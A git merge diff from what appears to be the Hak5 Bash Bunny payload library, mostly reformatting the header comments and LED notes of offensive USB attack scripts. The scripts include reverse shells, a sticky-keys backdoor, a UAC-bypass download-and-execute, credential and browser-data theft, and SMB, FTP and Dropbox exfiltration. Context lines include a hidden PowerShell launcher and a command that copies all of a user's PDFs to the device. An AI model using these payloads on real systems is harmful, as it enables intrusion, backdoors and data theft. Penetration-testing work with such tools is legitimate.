Merge branch 'cleanup' of github.com:hak5/bashbunny-payloads into cleanup

payloads/library/execution/RAZ_VBScript/payload.txt

@@ -4,17 +4,15 @@
 # Author:        RalphyZ
 # Version:       1.1a
 # Target:        Windows 7+
-# Dependencies:  VBScript (a.vbs) in the switch folder with this file
+# Dependencies:  Included a.vbs script
 # 
 # Description:   Executes a VBScript, concealed in a hidden PowerShell window
 #
-# Colors:
+# LEDS:
-# | Status     | Color                         | Description                                      |
+# Magenta: Setting attack mode, getting the switch position
-# | ---------- | ------------------------------| ------------------------------------------------ |
+# Red Blink: Could not find the a.vbs script
-# | SETUP      | Magenta solid                 | Setting attack mode, getting the switch position | 
+# Yellow Single Blink: Running the VBScript
-# | FAIL       | Red slow blink                | Could not find the a.vbs script                  | 
+# Green Blink to Solid: Script is finished
-# | ATTACK     | Yellow single blink           | Running the VBScript                             | 
-# | FINISH     | Green blink followed by SOLID | Script is finished                               | 
 
 # Magenta solid
 LED SETUP
@@ -43,4 +41,4 @@ QUACK ENTER
 
 # Green 1000ms VERYFAST blink followed by SOLID
 LED FINISH
-exit 0
+exit 0

payloads/library/execution/RevShellBack/payload.txt

@@ -1,12 +1,19 @@
 #!/bin/bash
 #
 # Title:         RevShellBack
-# Description:   Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet.
 # Author:        NodePoint
 # Version:       0.1.3
 # Category:      Execution
 # Target:        Windows
-# Attackmodes:   Ethernet, HID
+# Attack Modes:  RNDIS_ETHERNET, HID
+# Description:   Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet.
+#
+# LEDS:
+# Magenta: Setup
+# Yellow Single Blink: Open CMD
+# Yellow Double Blink: Start Reverse Shell
+# Cyan Blink: Attack
+# Green: Finished
 
 # Set attack mode
 LED SETUP

payloads/library/execution/ShellExec/payload.txt

@@ -2,17 +2,17 @@
 
 # Title:     ShellExec
 # Author:    audibleblink
-# Target:    Mac/Linux
+# Target:    Mac, Linux
 # Version:   1.1
+# Attack Modes: ECM_ETHERNET, HID
+# Description: Create a web server on the BashBunny and force the victim to download and execute a script.
+#              Perfect for when mass storage isn't an option.
 #
-# Create a web server on the BashBunny and force
+# LEDS:
-# the victim to download and execute a script.
+# White: Ready
-# Perfect for when mass storage isn't an option.
+# Amber Blink: Waiting for server
-#
+# Blue Blink: Attacking
-# White            |  Ready
+# Green: Finished
-# Ammber blinking  |  Waiting for server
-# Blue blinking    |  Attacking
-# Green            |  Finished
 
 LED SETUP
 ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E

payloads/library/execution/StickyBunny/payload.txt

@@ -1,15 +1,17 @@
 #!/bin/bash
 #
-# Title:         StickyBunny
+# Title:        StickyBunny
-# Author:        Squibs
+# Author:       Squibs
-# Version:       0.3
+# Version:      0.3
-# Plug2Pwn:		 18s
+# Attack Modes: HID
+# Target:       Windows
+# Runtime:      18s
+# Description:  Creates the sticky keys back door on a windows machine
 #
-# Creates the sticky keys back door on a windows machine
+# LEDS:
-#
+# Blue: Preparing Attack
-# Blue...............Preparing Attack
+# Yellow: Attacking
-# Yellow.............Attacking
+# Green: Finished
-# Green..............GTFO
 
 #Open Admin Powershell 
 ATTACKMODE HID

payloads/library/execution/exe_UACBypassD&E/payload.txt

@@ -1,14 +1,24 @@
-# Title:         UACBypass
+# Title:        UACBypass
-# Author:        Skiddie
+# Author:       Skiddie
-# Version:       1.1
+# Version:      1.1
-# Target:        Windows
+# Target:       Windows
+# Attack Modes: HID, STORAGE 
 #
-# Description: Download and executes any binary executable with administrator privileges WITHOUT prompting the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10. The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges. However from what i am aware version 7,8 and 8.1 are still effected. Currently fastest download and execute for HID attacks to date. (with UAC bypass)
+# Description:  Download and executes any binary executable with administrator privileges WITHOUT prompting
+#               the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME
+#               in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10.
+#               The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges.
+#               However from what I am aware version 7,8 and 8.1 are still effected.
+#               Currently fastest download and execute for HID attacks to date. (with UAC bypass)
+#
+# LEDS:
+# Magenta: Starting
+# Green: Finished
 
 #Define your bunny storage stick name
 DRIVER_LABEL='BashBunny'
 
-#RED means starting
+#Magenta means starting
 LED SETUP
 
 #Gets File locations
@@ -17,7 +27,6 @@ GET SWITCH_POSITION
 #We are a keyboard
 ATTACKMODE HID STORAGE
 
-
 QUACK DELAY 500
 RUN WIN powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'payloads\\$SWITCH_POSITION\a.vbs')"
 QUACK DELAY 1000

payloads/library/execution/psh_DownloadExec/payload.txt

@@ -4,18 +4,17 @@
 # Author:        LowValueTarget
 # Version:       1.2
 # Category:      Powershell
-# Target:        Windows XP SP3+ (Powershell)
+# Target:        Windows XP SP3+
 # Attackmodes:   HID, RNDIS_ETHERNET
 # Firmware:      >= 1.3
+# Description: Quick HID attack to retrieve and run powershell payload from BashBunny web server.
+#              Ensure p.txt (your powershell payload) exists in payload directory
 #
-# Quick HID attack to retrieve and run powershell payload from BashBunny web server
+# LEDS:
-# ensure p.txt (your powershell payload) exists in payload directory
+# Yellow Single Blink: Running Initial Powershell Commands
-#
+# Yellow Double Blink: Delivering powershell payload
-# | Attack Stage        | Description                              |
+# Green: Finished
-# | ------------------- | ---------------------------------------- |
+# Red Blink: Failure
-# | Stage 1             | Running Initial Powershell Commands      |
-# | Stage 2             | Delivering powershell payload            |
-#
 
 ATTACKMODE RNDIS_ETHERNET HID
 LED SETUP

payloads/library/execution/psh_DownloadExecSMB/payload.txt

@@ -4,26 +4,22 @@
 # Author:        LowValueTarget
 # Version:       2.0
 # Category:      Powershell
-# Target:        Windows XP SP3+ (Powershell)
+# Target:        Windows XP SP3+
-# Attackmodes:   HID, RNDIS_ETHERNET
+# Attack Modes:  HID, RNDIS_ETHERNET
 # Firmware:      >= 1.2
+# Required Tools: impacket 
+# Description: Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer.
+#              Possibilities are limitless! Credentials captured by  are stored as loot.  
+#              Ensure p.txt exists in payload directory  (using .txt instead of .ps1 in case of security countermeasures)
 #
-# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless!
+# LEDS:
-# Credentials captured by  are stored as loot.  
+# Magenta: Setup
-# Ensure p.txt exists in payload directory  (using .txt instead of .ps1 in case of security countermeasures)
+# Yellow Single Blink: Powershell
-#
+# Yellow Double Blink: Delivering powershell payload
-# Required tools: impacket 
+# White: Clean up
-=======
+# Green: Finished
-# Credentials captured by  are stored as loot.
-# Ensure p.txt exists in payload directory  (using .txt instead of .ps1 in case of security countermeasures)
-#
-# Required tools: impacket
-#
-# | Attack Stage        | Description                   |
-# | ------------------- | ------------------------------|
-# | Stage 1             | Powershell                    |
-# | Stage 2             | Delivering powershell payload |
 #
+
 ATTACKMODE RNDIS_ETHERNET HID
 
 # SETUP

payloads/library/exfiltration/BlackBackup/payload.txt

@@ -1,16 +1,17 @@
-# Title:         BlackBackup
-# Author:        JWHeuver & JBaselier
-# Version:       1.0
-#
-# Runs powershell script to get Wlan and logon credentials
-# from computer and save them on USB drive (Storage attack)
-#
-# Purple.............Loading
-# Green .............Execute Credential Ripper Powershell
-# Off................Finished
-#
 #!/bin/bash
 
+# Title:       BlackBackup
+# Author:      JWHeuver & JBaselier
+# Version:     1.0
+# Description: Runs powershell script to get Wlan and logon credentials 
+#	       from computer and save them on USB drive (Storage attack)
+#
+# LEDS:
+# Purple: Loading
+# Green:  Execute Credential Ripper Powershell
+# Off:     Finished
+#
+
 # OPTIONS - More options available in the Powershell payload
 OBFUSCATECMD="N" # Y=yes or N=no
 

payloads/library/exfiltration/FileInfoExfil/payload.txt

@@ -1,18 +1,21 @@
-#Title: FileInfoExfiltrator
+#!/bin/bash
-#Author: A_SarcasticGuy
+
-#Version: 1.0
+# Title: FileInfoExfiltrator
-#Target: Windows
+# Author: A_SarcasticGuy
+# Version: 1.0
+# Attack Modes: HID, STORAGE
+# Targets: Windows
+# Description:  Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided)
+#               for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*")
+#               to then be outputted to a text file in the loot directory, in a subfolder with the name of the
+#               system and with a file name of the date and time of the scan.
+#             	NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
 #
-#Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided) for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*") to then #be outputted to a text file in the loot directory, in a subfolder with the name of the system and with a #file name of the date and time of the scan.
+# LEDS
+#	Magenta: Script Started
+#	Yellow: Ducky Script Started
+#	Red: Failed to run Ducky Script, see log file
 #
-#	Options: Search Directory: Find in p.bat (default c:/)
-#	 	 Search criteria: Find in p.bat (default "pass*")
-#
-#	Purple LED..................Script Started
-#	Yellow LED..................Ducky Script Started
-#	Red LED.....................Failed to run Ducky Script, see log file
-#
-#	NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
 #
 
 LED SETUP
@@ -23,29 +26,18 @@ ATTACKMODE HID STORAGE
 
 if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
 
-
 #Call ducky script
 LED STAGE1
 
-
 QUACK ${SWITCH_POSITION}/ducky_script.txt
-
-
 QUACK DELAY 10000
-
 LED FINISH
 
 else
 
-
 LED FAIL
-
-
 #Red LED if unable to load script
 echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
 
-
 exit 1
-
-
 fi

payloads/library/exfiltration/MacPDFExfil/payload.txt

@@ -4,9 +4,9 @@
 # Author:        k1ul3ss
 # Props:         audibleblink
 # Version:       1.0
-# Category:      Exfiltration
+# Targets:       macOS
-# Target:        macOS
+# Attack Modes:  HID, Storage
-# Attackmodes:   HID, Storage
+# Description:   Finds all PDFs in the users Home directory, and then copies them to the Bunnys storage.
 
 ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
 
@@ -28,4 +28,4 @@ QUACK STRING find \~ -name \'*.pdf\' -exec cp \"{}\" $lootdir \\\;\; killall Ter
 QUACK ENTER
 
 # sync the filesystem
-sync
+sync

payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt

@@ -3,10 +3,15 @@
 # Title:         Powershell Extractor
 # Author:        $irLurk$alot
 # Version:       1.0
-# Target:        Windows
+# Targets:       Windows
+# Attack Modes:  HID, STORAGE
+# Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
+#              which in turn runs powershell script to copy move and extract data.
 #
-# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
+# LEDS:
-# which in turn runs powershell script to copy move and extract data.
+# Magenta: Setting Up
+# Yellow Blink: Executing Powershell
+# Green: Finished
 
 LED SETUP
 

payloads/library/exfiltration/SmacAndGrab/payload.txt

@@ -2,13 +2,14 @@
 #
 # Title:         sMacAndGrab
 # Author:        audibleblink
-# Target:      macOS
+# Targets:       macOS
 # Version:       1.2
+# Attack Modes:  STORAGE, HID
+# Description:   Backup a list of files from macOS
 #
-# Backup a list of files from macOS
+# LEDS:
-#
+# Yellow Blink: Attacking
-# Yellow (blinking)...Attacking
+# Green: Finished
-# Green...............Finished
 
 LED ATTACK
 ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E

payloads/library/exfiltration/SmartFileExtract/payload.txt

@@ -1,16 +1,18 @@
 #!/bin/bash
 #
-# Title:         ExecutableInstaller
+# Title:       SmartFileExtract
-# Author:        IMcPwn (original)
+# Author:      IMcPwn
-# Additions:     SaintCrossbow (only for the parts to run SFE)
+# Props:       SaintCrossbow
-# Version:       1.0
+# Version:     1.0
-# Target:        Windows 7+
+# Targets:     Windows
-#
+# Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
-# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
+#              which in turn executes e.cmd invisibly using i.vbs
-# which in turn executes e.cmd invisibly using i.vbs
+#              which in turn copies payload.exe from the root of the Bash Bunny and then executes it
-# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
+#              using the --startup parameter. Change these settings inside of e.cmd.
-# using the --startup parameter. Change these settings inside of e.cmd.
 #
+# LEDS:
+# Red: Attacking
+# Green: Finished
 
 # Source bunny_helpers.sh to get environment variable SWITCH_POSITION
 source bunny_helpers.sh

payloads/library/exfiltration/TwoStageMac/payload.txt

@@ -1,12 +1,18 @@
 # Title:         TwoStageMac
 # Description:   A simple two stage payload for OSX. Sample second stage
 #                does some device profiling.
+#
 # Author:        Draxiom
 # Props:         jdetmold
 # Version:       1.0
 # Category:      Exfiltration
 # Target:        OSX
 # Attack Modes:  HID, STORAGE
+# LEDS:
+# Magenta - Setup
+# Yellow Blink - Attacking
+# White - Clean up
+# Green - Finished
 
 LED SETUP
 ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE

payloads/library/exfiltration/browserData/payload.txt

@@ -2,16 +2,17 @@
 #
 # Title:         BrowserData
 # Author:        zachstanford
-# Version:       0.1 (Tested on Windows 10)
+# Version:       0.1
+# Targets:       Windows
+# Attack Modes:  HID, STORAGE
+# Description:   Dumps browser info like history and bookmarks from  powershell script 
+#                then saves them in /root/udisk/loot/BrowserData/%ComputerName%
+#                Credits to this Empire's powershell script:
+#                https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1
 #
-# Dumps browser info like history and bookmarks from  powershell script 
+# LEDS:
-# then saves them in /root/udisk/loot/BrowserData/%ComputerName%
+# Blue: Running Script
-# Credits to this Empire's powershell script:
+# Magenta: Finished
-# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1
-
-#script 
-# Blue...............Running Script
-# Purple.............Finished
 
 # Not sure if this is the right variable. Feel free to change it.
 
@@ -23,7 +24,6 @@ LED R SLOW
 LOOTDIR=/root/udisk/loot/BrowserData
 mkdir -p $LOOTDIR
 
-
 LED B SLOW
 
 # wait 6 seconds for the storage to popup

payloads/library/exfiltration/dropbox-exfiltrator/payload.txt

@@ -1,9 +1,14 @@
-# Dropbox Exfiltrator
+# Title: Dropbox Exfiltrator
 # Author: Hak5Darren
-# Props: jimcola99 Buchanan
+# Props: jimcola99, Buchanan
-# Demo: Hak5 episode 2505
+# Demo: Hak5 Episode 2505
-# Target: Windows Vista+
+# Targets: Windows
-# Category: Exfiltration
+# Description: Exfiltrate via DropBox
+#
+# LEDS:
+# Magenta: Setup
+# Yellow Blink: Getting Script
+# Green: Finish
 
 LED SETUP
 ATTACKMODE HID

payloads/library/exfiltration/ftp_exfiltrator/payload.txt

@@ -1,19 +1,17 @@
 #!/bin/bash
 #
-# Title:         FTP Exfiltrator
+# Title:       FTP Exfiltrator
-# Author:        Nutt
+# Author:      Nutt
-# Version:       1.0
+# Version:     1.0
-# Target:        Windows
+# Targets:     Windows
+# Description: Exfiltrates files from the users Documents folder FTP's all files/folders to a specified
+#              FTP site named by the victim hostname. Powershell FTP script will stay running after
+#              BashBunny is unpluggedonce light turns green unplug and check FTP site.
 #
-#Exfiltrates files from the users Documents folder
+# LEDS:
-#FTP's all files/folders to a specified FTP site named by the victim hostname.
+# Purple: Setup
-#Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.
+# Red: Failed - Need to work on
-
+# Green: Finished
-#Executes 1.ps1
-
-#Purple.........Setup
-#Red............Failed - Need to work on
-#Green..........Finished
 
 LED SETUP
 GET SWITCH_POSITION

payloads/library/exfiltration/optical-exfiltration/payload.txt

@@ -1,31 +1,22 @@
 #!/bin/bash
 #
-# Title:         Optical Exfiltration
+# Title:        Optical Exfiltration
-# Author:        bg-wa
+# Author:       bg-wa
-# Version:       1.0
+# Version:      1.0
-# Category:      HID
+# Targets:      macOS, Linux
-# Target:        *NIX
+# Attack Modes: HID
-# Attackmodes:   HID
+# Sources:      Hak5 2320, https://github.com/bg-wa/QRExtractor
-# Sources:       Hak5 2320, https://github.com/bg-wa/QRExtractor
+# Description:  Quick HID only attack to write an HTML/JS file to target machine
+#               and open a browser, to exfiltrate data Using QR Codes and a video recording device.
+#               Optional html params:
+#               base64: Passing a base64 string to this param will auto-start processing QR Codes.
+#               playback: Passing the string "finish" to this param will auto-play the results, when QR codes finish rendering.
+#               Example: Ln65: Q STRING firefox "$target_html?playback=finish&base64=my_long_string"
 #
-# Quick HID only attack to write an HTML/JS file to target machine
+# LEDS:
-# and open a browser, to exfiltrate data Using QR Codes and a video
+# Magenta: Open vi
-# recording device.
+# Yellow Blink: Writing HTML
-#
+# Green:  Browser Ready/Processing
-# Optional html params:
-# base64: Passing a base64 string to this param will auto-start processing QR Codes.
-#
-# playback: Passing the string "finish" to this param will auto-play the results,
-#           when QR codes finish rendering.
-#
-# Example:
-# Ln65: Q STRING firefox "$target_html?playback=finish&base64=my_long_string"
-#
-# | Attack Stage        | Description                              |
-# | ------------------- | ---------------------------------------- |
-# | SETUP               | Open vi                                  |
-# | ATTACK              | Writing HTML                             |
-# | FINISH              | Browser Ready/Processing                            |
 #
 
 ATTACKMODE HID
@@ -65,4 +56,4 @@ Q ENTER
 Q STRING firefox "$target_html"
 Q ENTER
 
-LED FINISH
+LED FINISH

payloads/library/exfiltration/simple-usb-extractor/payload.txt

@@ -1,4 +1,16 @@
-# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs
+#!/bin/bash
+#
+# Title: simple-usb-extractor
+# Version: 1.0
+# Author: danthegoodman1
+# Targets: Windows
+# Attack Modes: HID, STORAGE
+# Description: Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs
+# 
+# LEDS:
+# Yellow Blink - Attacking
+# Green - Finished
+
 GET SWITCH_POSITION
 LED ATTACK
 ATTACKMODE HID STORAGE

payloads/library/exfiltration/smb_exfiltrator/payload.txt

@@ -4,47 +4,20 @@
 # Author:        Hak5Darren
 # Props:         ImNatho, mike111b, madbuda
 # Version:       1.1
-# Category:      Exfiltration
+# Target:        Windows XP
-# Target:        Windows XP SP3+ (Powershell)
+# Attack Modes:  HID, RNDIS_ETHERNET
-# Attackmodes:   HID, Ethernet
+# Requires:      Impacket Tool
+# Description:   Exfiltrates select files from users's documents folder via SMB.
+#                Liberated documents will reside in Bash Bunny loot directory under
+#                loot/smb_exfiltrator/HOSTNAME/DATE_TIME. Exfiltration options configured from included s.ps1 script.
 #
-# CHANGELOG
+# LEDS:
-# =========
+# Red: Failed to find dependencies
-# Rewrite of the original SMB Exfiltrator payload with:
+# Yellow Single Blink: HID Stage
-# - Faster copying, using robocopy multithreaded mode
+# Yellow Double Blink: Ethernet Stage
-# - Faster finish, using a EXFILTRATION_COMPLETE file
+# Cyan: Receiving Files
-# - Offload logic to target PC for accurate date/time
+# White: Moving Liberated Files
-# - Clears tracks by default without second run dialog
+# Green: Finished
-# - Test-Connection handling by ICMP (no lame sleeps)
-# - Hidden powershell window by default
-#
-# REQUIREMENTS
-# ============
-# Needs impacket to be copied to /tools/impacket and installed
-# Option A:
-#   1. Download impacket from https://github.com/CoreSecurity/impacket
-#   2. Copy impacket folder to /tools on the Bash Bunny flash drive
-#   3. Boot Bash Bunny into arming mode and connect to console via serial
-#   4. Issue "python /tools/impacket/setup.py install"
-# Option B:
-#   1. Download impacket deb package 
-#   2. Copy impacket.deb to /tools on the Bash Bunny flash drive
-#   3. Boot Bash Bunny into arming mode. Impacket will install automatically.
-# 
-# LED STATUS
-# ==========
-# FAIL........Failed to find dependencies
-# STAGE1......HID Stage
-# STAGE2......Ethernet Stage
-# SPECIAL.....Receiving Files
-# CLEANUP.....Moving Liberated Files
-# FINISH......Finished
-#
-# OPTIONS
-# =======
-# Exfiltration options configured from included s.ps1 script
-
-
 
 ######## INITIALIZATION ########
 REQUIRETOOL impacket

payloads/library/exfiltration/usb_exfiltrator/payload.txt

@@ -3,14 +3,16 @@
 # Title:         USB Exfiltrator
 # Author:        Hak5Darren
 # Version:       1.1
-# Target:        Windows XP SP3+
+# Target:        Windows XP
 # Props:         Diggster, IMcPwn
-# Category:      Exfiltration
+# Description:   Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
-#
+#                which in turn executes e.cmd invisibly using i.vbs
-# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
+#                which in turn copies documents to the loot folder on the Bash Bunny.
-# which in turn executes e.cmd invisibly using i.vbs
-# which in turn copies documents to the loot folder on the Bash Bunny.
 #
+# LEDS:
+# Yellow Blink: Attacking
+# Green: Finished
+
 GET SWITCH_POSITION
 LED ATTACK
 ATTACKMODE HID STORAGE